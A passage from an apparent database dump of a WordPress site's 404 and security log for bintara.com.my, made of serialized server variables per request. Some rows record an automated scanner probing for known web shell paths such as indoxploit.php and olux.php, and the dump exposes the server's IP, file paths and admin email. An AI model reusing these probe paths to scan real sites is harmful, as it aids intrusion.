NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/indoxploit.php\";s:10:\"SCRIPT_URL\";s:15:\"/indoxploit.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfw8b-TGwg8JtoKWMVXXAAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570238705.9936\";s:12:\"REQUEST_TIME\";s:10:\"1570238705\";}}','notice','2019-10-05 01:25:09','2019-10-05 01:25:06',35426968,37227784,'https://bintara.com.my/indoxploit.php',1,0,'51.79.4.180'),(27513,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/olux.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/olux.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/olux.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfw54UvsCPAO@kc@Ic6QQAAAEw\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/olux.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/olux.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfw54UvsCPAO@kc@Ic6QQAAAEw\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"51.79.4.180\";s:11:\"REMOTE_PORT\";s:5:\"58321\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/olux.php\";s:10:\"SCRIPT_URL\";s:9:\"/olux.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfw54UvsCPAO@kc@Ic6QQAAAEw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570238695.7472\";s:12:\"REQUEST_TIME\";s:10:\"1570238695\";}}','notice','2019-10-05 01:24:57','2019-10-05 01:24:56',35037152,36842464,'https://bintara.com.my/olux.php',1,0,'51.79.4.180'),(27512,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:38:\"/wp-content/plugins/html404/index.html\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:60:\"https://bintara.com.my/wp-content/plugins/html404/index.html\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:38:\"/wp-content/plugins/html404/index.html\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfw2YhgyMNsP7cgznGrGgAAAUE\";s:19:\"REDIRECT_SCRIPT_URI\";s:60:\"https://bintara.com.my/wp-content/plugins/html404/index.html\";s:19:\"REDIRECT_SCRIPT_URL\";s:38:\"/wp-content/plugins/html404/index.html\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfw2YhgyMNsP7cgznGrGgAAAUE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"51.79.4.180\";s:11:\"REMOTE_PORT\";s:5:\"54973\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:60:\"https://bintara.com.my/wp-content/plugins/html404/index.html\";s:10:\"SCRIPT_URL\";s:38:\"/wp-content/plugins/html404/index.html\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfw2YhgyMNsP7cgznGrGgAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570238681.7081\";s:12:\"REQUEST_TIME\";s:10:\"1570238681\";}}','notice','2019-10-05 01:24:43','2019-10-05 01:24:42',35062880,36872792,'https://bintara.com.my/wp-content/plugins/html404/index.html',1,0,'51.79.4.180'),(27503,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/cms/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/cms/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/cms/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfLNhUa2vfvAyNPr0iUpAAAAJI\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/cms/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/cms/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfLNhUa2vfvAyNPr0iUpAAAAJI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"188.213.166.219\";s:11:\"REMOTE_PORT\";s:5:\"45894\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/cms/\";s:10:\"SCRIPT_URL\";s:5:\"/cms/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfLNhUa2vfvAyNPr0iUpAAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570229046.2839\";s:12:\"REQUEST_TIME\";s:10:\"1570229046\";}}','notice','2019-10-04 22:44:09','2019-10-04 22:44:07',35035072,36846856,'https://bintara.com.my/cms/?xxxxxxxxxxxx_loads=true',1,0,'188.213.166.219'),(27504,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/beta/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/beta/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/beta/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfOWjrYaHfWbFmyiE2BYwAAAYw\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/beta/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/beta/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfOWjrYaHfWbFmyiE2BYwAAAYw\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"196.47.64.42\";s:11:\"REMOTE_PORT\";s:5:\"38124\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/beta/\";s:10:\"SCRIPT_URL\";s:6:\"/beta/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfOWjrYaHfWbFmyiE2BYwAAAYw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570229850.8486\";s:12:\"REQUEST_TIME\";s:10:\"1570229850\";}}','notice','2019-10-04 22:57:33','2019-10-04 22:57:31',35032560,36842416,'https://bintara.com.my/beta/?xxxxxxxxxxxx_loads=true',1,0,'196.47.64.42'),(27505,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:76:\"text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; SemrushBot/6~bl; +http://www.semrush.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.229.168.149\";s:11:\"REMOTE_PORT\";s:5:\"23110\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfVdBUa2vfvAyNPr0iWMAAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570231669.0393\";s:12:\"REQUEST_TIME\";s:10:\"1570231669\";}}','notice','2019-10-04 23:27:52','2019-10-04 23:27:49',35413472,37205056,'https://bintara.com.my/?page_id=11',1,0,'46.229.168.149'),(27506,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/blog/tag/logitech-rally/feed/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/blog/tag/logitech-rally/feed/\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/blog/tag/logitech-rally/feed/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfhhohgyMNsP7cgznGkwwAAAU8\";s:12:\"REDIRECT_URL\";s:30:\"/blog/tag/logitech-rally/feed/\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.150.185\";s:11:\"REMOTE_PORT\";s:5:\"29872\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/blog/tag/logitech-rally/feed/\";s:10:\"SCRIPT_URL\";s:30:\"/blog/tag/logitech-rally/feed/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfhhohgyMNsP7cgznGkwwAAAU8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570234758.2682\";s:12:\"REQUEST_TIME\";s:10:\"1570234758\";}}','notice','2019-10-05 00:19:21','2019-10-05 00:19:18',35434536,37238848,'https://bintara.com.my/blog/tag/logitech-rally/feed/',1,0,'54.36.150.185'),(27507,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:33:\"/staging/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/staging/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/staging/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfjLoUvsCPAO@kc@Ic40QAAAEk\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/staging/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/staging/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfjLoUvsCPAO@kc@Ic40QAAAEk\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"188.213.175.168\";s:11:\"REMOTE_PORT\";s:5:\"39536\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/staging/\";s:10:\"SCRIPT_URL\";s:9:\"/staging/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfjLoUvsCPAO@kc@Ic40QAAAEk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570235182.5183\";s:12:\"REQUEST_TIME\";s:10:\"1570235182\";}}','notice','2019-10-05 00:26:25','2019-10-05 00:26:22',35034096,36840168,'https://bintara.com.my/staging/?xxxxxxxxxxxx_loads=true',1,0,'188.213.175.168'),(27508,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/wp-content/plugins/upspy/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=69d7e79ff25551312e66f59b67bf1dd6\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/plugins/upspy/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/wp-content/plugins/upspy/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZfwtr-TGwg8JtoKWMVXMgAAABY\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/plugins/upspy/\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/wp-content/plugins/upspy/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZfwtr-TGwg8JtoKWMVXMgAAABY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"51.79.4.180\";s:11:\"REMOTE_PORT\";s:5:\"62328\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/plugins/upspy/\";s:10:\"SCRIPT_URL\";s:26:\"/wp-content/plugins/upspy/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZfwtr-TGwg8JtoKWMVXMgAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570238646.7544\";s:12:\"REQUEST_TIME\";s:10:\"1570238646\";}}','notice','2019-10-05 01:24:10','2019-10-05 